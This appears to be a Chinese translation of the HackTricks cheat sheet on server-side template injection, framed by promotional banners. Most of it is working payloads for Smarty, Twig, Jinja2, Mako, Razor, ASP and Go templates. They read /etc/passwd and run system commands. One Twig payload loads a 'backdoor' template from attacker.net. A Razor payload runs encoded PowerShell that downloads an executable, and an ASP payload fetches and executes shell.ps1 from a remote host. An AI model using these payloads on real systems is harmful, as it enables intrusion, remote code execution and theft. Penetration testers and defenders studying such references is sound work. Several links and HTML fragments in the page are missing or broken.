# SSTI (Server Side Template Injection)

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式： * 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一，也是**欧洲**最重要的之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士在各个领域的热点交流会。 {% embed url="" %} ## ### Smarty (PHP) ```php {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} {system('ls')} // compatible v3 {system('cat index.php')} // compatible v3 ``` **更多信息** * 在的Smarty部分 * ### Twig (PHP) * `{{7*7}} = 49` * `${7*7} = ${7*7}` * `{{7*'7'}} = 49` * `{{1/0}} = Error` * `{{foobar}} Nothing` ```python #Get Info {{_self}} #(Ref. to current application) {{_self.env}} {{dump(app)}} {{app.request.server.all|join(',')}} #File read "{{'/etc/passwd'|file_excerpt(1,30)}}"@ #Exec code {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}} {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}} {{['id']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}} {{['id',""]|sort('system')}} #Hide warnings and errors for automatic exploitation {{["error_reporting", "0"]|sort("ini_set")}} ``` **Twig - 模板格式** ```php $output = $twig > render ( 'Dear' . $_GET['custom_greeting'], array("first_name" => $user.first_name) ); $output = $twig > render ( "Dear {first_name}", array("first_name" => $user.first_name) ); ``` **更多信息** * 在[Twig和Twig（沙盒）](https://portswigger.net/research/server-side-template-injection)部分 * ### Plates（PHP） Plates是一种原生于PHP的模板引擎，灵感来自Twig。然而，与Twig不同的是，Plates在模板中利用原生PHP代码，使其对PHP开发人员更直观。 ```php // Create new Plates instance $templates = new League\Plates\Engine('/path/to/templates'); // Render a template echo $templates->render('profile', ['name' => 'Jonathan']); ``` 页面模板： ```php layout('template', ['title' => 'User Profile']) ?>

User Profile

Hello, e($name)?>

``` 布局模板： ```html <?=$this->e($title)?> section('content')?> ``` **更多信息** * ### PHPlib 和 HTML\_Template\_PHPLIB (PHP) [HTML\_Template\_PHPLIB](https://github.com/pear/HTML_Template_PHPLIB) 与 PHPlib 相同，但移植到了 Pear。 `authors.tpl` ```html {PAGE_TITLE}

Authors
Name	Email
{NUM_AUTHORS}
{AUTHOR_NAME}	{AUTHOR_EMAIL}

` ```python {% debug %} {{settings.SECRET_KEY}} {{4*4}}[[5*5]] {{7*'7'}} would result in 7777777 ``` **Jinja2 - 模板格式** ```python {% extends "layout.html" %} {% block body %}

{{ user.username }}

{% endblock %} ``` [**不依赖**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__` 的 RCE： ```python {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} # Or in the shotest versions: {{ cycler.__init__.__globals__.os.popen('id').read() }} {{ joiner.__init__.__globals__.os.popen('id').read() }} {{ namespace.__init__.__globals__.os.popen('id').read() }} ``` **关于如何滥用Jinja的更多细节**: {% content-ref url="ssti-server-side-template-injection/jinja2-ssti" %} [jinja2-ssti](https://hacktricks.xsx.tw/pentesting-web/ssti-server-side-template-injection/jinja2-ssti) {% endcontent-ref %} 其他有效载荷请参考 ### Mako (Python) ```python <% import os x=os.popen('id').read() %> ${x} ``` **更多信息** * ### Razor (.Net) * `@(2+2) <= 成功` * `@() <= 成功` * `@("{{code}}") <= 成功` * `@ <= 成功` * `@{} <= 错误！` * `@{ <= 错误！` * `@(1+2)` * `@( //C#Code )` * `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");` * `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBXAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");` .NET的`System.Diagnostics.Process.Start`方法可用于在服务器上启动任何进程，从而创建Webshell。您可以在找到一个易受攻击的Web应用示例。 **更多信息** * * ### ASP * `<%= 7*7 %>` = 49 * `<%= "foo" %>` = foo * `<%= foo %>` = 无 * `<%= response.write(date()) %>` = \ ```xml <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %> ``` **更多信息** * ### Mojolicious (Perl) 即使是 Perl，它也使用类似 Ruby 中的 ERB 标记。 * `<%= 7*7 %> = 49` * `<%= foobar %> = Error` ``` <%= perl code %> <% perl code %> ``` ### GO 中的 SSTI 在 Go 的模板引擎中，可以使用特定的有效载荷来确认其使用方式： * `{{ . }}`: 显示数据结构输入。例如，如果传递了一个带有 `Password` 属性的对象，`{{ .Password }}` 可能会暴露它。 * `{{printf "%s" "ssti" }}`: 预期显示字符串 "ssti"。 * `{{html "ssti"}}`, `{{js "ssti"}}`: 这些有效载荷应返回 "ssti" 而不附加 "html" 或 "js"。更多指令可以在 Go 文档中探索 [这里](https://golang.org/pkg/text/template)。 **XSS 利用** 使用 `text/template` 包，可以通过直接插入有效载荷来简单地进行 XSS 攻击。相反，`html/template` 包对响应进行编码以防止此类攻击（例如，`{{""}}` 的结果是 `<script>alert(1)</script>`）。然而，在 Go 中，模板定义和调用可以绕过此编码：{{define "T1"}}alert(1){{end}} {{template "T1"}} vbnet 复制代码 **RCE 利用** `html/template` 和 `text/template` 之间的 RCE 利用方式有很大不同。`text/template` 模块允许直接调用任何公共函数（使用“call”值），而在 `html/template` 中不允许这样做。这些模块的文档可在 [这里查看 html/template](https://golang.org/pkg/html/template/) 和 [这里查看 text/template](https://golang.org/pkg/text/template/)。对于 Go 中的 SSTI，可以调用对象方法来实现 RCE。例如，如果提供的对象具有执行命令的 `System` 方法，可以像这样利用它：`{{ .System "ls" }}`。通常需要访问源代码才能利用此功能，就像给定的示例中所示： ```go func (p Person) Secret (test string) string { out, _ := exec.Command(test).CombinedOutput() return string(out) } ``` **更多信息** * * ### 更多利用查看获取更多利用。您还可以在中找到有趣的标签信息。 ## BlackHat PDF {% file src="" %} ## 相关帮助如果您认为有用，请阅读： * [Flask技巧](https://hacktricks.xsx.tw/network-services-pentesting/pentesting-web/flask) * [Python魔术函数](https://github.com/carlospolop/hacktricks/blob/cn/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md) ## 工具 * * * * ## 暴力检测列表 {% embed url="" %} ## 练习和参考 * * *

[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一，也是**欧洲**最重要的之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士在各个领域的热点聚会。 {% embed url="" %}

从零开始学习AWS黑客技术，成为专家 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式： * 如果您想在HackTricks中看到您的**公司广告**或**下载PDF**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。 * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。